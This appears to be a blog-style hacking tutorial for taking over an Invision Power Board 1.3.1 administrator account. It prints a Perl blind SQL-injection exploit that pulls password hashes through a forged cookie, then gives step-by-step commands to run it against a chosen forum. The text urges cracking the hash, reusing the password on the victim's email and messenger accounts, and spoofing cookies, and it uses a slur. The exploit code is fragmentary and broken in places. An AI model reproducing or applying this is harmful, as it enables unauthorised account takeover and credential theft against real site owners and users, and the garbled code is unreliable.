This tutorial will allow you to get an admins password and hack the
forum.
First of all, what you need is a forum to hack. For the
sake of this tutorial, and for the safety of aspecific site, I will not release the URL of the site
that I will be hacking in this. I will be referring toit as "hackingsite"
So you've got your target. You know the forum to want to hack, but how?
Let's find the user we
want to hack. Typically, you'd want to hack the admin. The administrator
is usually the first
member, therefore his/her User ID will be "1". Find the User ID of the
administrator, or person you
wish to hack. For this tutorial, let's say his/her ID is "2".
Got it? Well, now we are almost all set. So far, we
know the site we wish to hack, and the memberwe wish to hack. In this case, we are hacking the
administrator of "hackingsite", which is User ID"2".
Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that
is in common circulation
around these forums. For those who don't have it, here:
CODE
#!/usr/bin/perl -w
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "ReMuSOMeGa & Nova" and http://remusomega.com
use LWP::UserAgent;
$ua = new LWP::UserAgent;
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{for( $j=0; $j < 16; $j++ )
"99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '';
$_ = $res->content;
last;
}}if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
exit;
# ReMuSoMeGa & nova
Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting "OK".
So now you have Perl installed. Open up "My Computer", and then click on "Local Disk (C:/)". In
there, you should see a folder named "Perl". Open up that folder, and within "Perl", you should
see another folder named "bin". Open up "bin". Now that your in, drag and drop "ipb.pl" from your
desktop, into "bin".
Alrighty. Now everything is fine, and you're ready to Pwn some FAGS.
cd C:\Perl\bin
Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we
need to access the ipb.pl file. How do we do this? Type the following command into your
command prompt:
perl ipb.p
At this point, it should be fairly obvious what to do.. But since I <3 n00bs so much, I'm going to elaborate.
So, this is what we need to do. Type the following command into your command prompt:
ipb.pl http://hackingsite.com/forum 2 1
Obviously replace "http://hackingsite.com/forum" with the URL to the forum you wish to hack.
Now, this may take a minute. The exploit is gathering information, and grabbing the hash.
Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f
But what can we do with this hash? To you, it just looks like a scramble of numbers and letters.
back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to
CRACK an MD5 hash.
whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or
MSN/AIM account. Sure bro, fuck them up
Well, you can spoof your cookie!
If you would like to learn more on spoofing cookies, use the friendly searching site they call
DOWNLOAD here: http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.813-MSWin32-x86- 148120.msi
[Credit for the first person who can post it.]
0 comments:
Post a Comment